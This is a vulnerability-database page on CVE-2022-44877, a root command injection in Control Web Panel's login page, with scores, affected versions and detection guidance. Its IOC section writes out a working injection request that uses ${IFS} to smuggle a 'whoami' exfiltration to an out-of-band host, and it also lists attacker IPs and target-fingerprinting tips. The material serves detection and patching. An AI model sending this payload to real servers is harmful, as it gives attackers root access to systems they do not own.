cbcvebase.
CVE-2022-44877
published 2023-01-05

CVE-2022-44877: login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-02-07
Exploited in the wild
EPSS
100.00%
100.0th percentile
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
control-webpanelwebpanel< 0.9.8.11470.9.8.1147

Detection & IOCsextracted from sources · hover to see the quote

path/login/index.php
ip206.189.170.136
ip185.117.73.208
ip157.230.62.113
ip180.183.132.35
urlPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}})
commandping${IFS}-nc${IFS}2${IFS}`whoami`
  • Use the Nuclei template matcher: look for HTTP 302 responses with body containing 'Login Redirect.' in response to a crafted POST to /login/index.php with shell metacharacters in the login parameter.
  • Fingerprint vulnerable CWP instances via Shodan or FOFA using the page title 'Login | Control WebPanel' before scanning for exploitation.
  • Successful exploitation results in code execution as the root user; the HTTP request blocks while the command runs and results are not returned in the HTTP response — use out-of-band (DNS/interactsh) detection.
  • The vulnerability is triggered when double quotes are used to log incorrect login entries to the system, allowing bash command injection — monitor CWP authentication logs for anomalous entries containing shell metacharacters.
  • ·Only CWP 7 versions before 0.9.8.1147 are vulnerable; instances already patched to 0.9.8.1147 or later are not affected.
  • ·According to Wiz data, CWP is not prevalent in cloud environments, so the risk of exploitation in cloud deployments is lower than in on-premises environments.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.